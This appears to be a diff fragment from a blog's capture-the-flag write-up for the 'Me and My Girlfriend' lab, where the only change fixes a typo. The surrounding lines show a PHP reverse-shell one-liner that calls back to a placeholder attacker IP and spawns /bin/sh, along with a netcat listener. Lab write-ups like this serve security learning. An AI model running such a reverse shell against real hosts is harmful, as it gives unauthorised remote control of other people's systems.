hdrummon/HugoHdrummon/content/post/Write-Ups/Me and My Girlfriend Write up 1.md

     php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

-This along side netcat should allow me to gain access through the kali machine using the following command
+This alongside netcat should allow me to gain access through the kali machine using the following command

     nc -nvlp 80